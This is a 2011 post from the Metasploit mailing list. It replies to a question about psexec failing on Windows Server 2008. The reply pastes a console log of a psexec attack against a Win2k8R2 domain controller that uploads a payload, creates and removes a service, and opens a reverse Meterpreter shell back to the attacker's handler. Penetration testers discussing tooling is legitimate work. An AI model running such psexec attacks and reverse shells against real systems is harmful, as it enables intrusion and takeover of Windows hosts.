Re: Psexec on W2K8

[Rob Fuller <mubix () room362 com>]

Any idea what GPO's are applied? Here is a session I just did against
a Win2k8R2 DC:

[*] Started reverse handler on 172.16.195.1:4444
[*] Connecting to the server...
[*] Authenticating to 172.16.195.130:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created \iNvFKRbm.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.16.195.130[\svcctl]
...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.16.195.130[\svcctl]
...
[*] Obtaining a service manager handle...
[*] Creating a new service (mtucOXte - "MsosjwWts")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \iNvFKRbm.exe...
[*] Sending stage (749056 bytes) to 172.16.195.130
[*] Meterpreter session 1 opened (172.16.195.1:4444 ->
172.16.195.130:64809) at Fri May 20 14:25:59 -0400 2011


For some reason recently I've been having troubles with other payloads
with Win7 and 2k8 but reverse_tcp works great.

Can you post or send the log entry? (minus identifying pieces of course ;-)


--
Rob Fuller | Mubix
Certified Checkbox Unchecker
Room362.com | Hak5.org



On Fri, May 20, 2011 at 8:47 AM, Flippen, Benoit C <FlippenBC2 () state gov> wrote:
> Anyone have any luck running psexec on a W2K8 box?
>
> Using admin credentials, it drops the file, creates the service, etc.,
> but never gets the payload executed. On the remote system, the event
> logs show an error about interactive services not being allowed in W2K8.
>
> Any ideas? I'm sure it's something simple I'm missing.
>
> Benoit
>
>
>
> This email is UNCLASSIFIED
> _______________________________________________
> https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework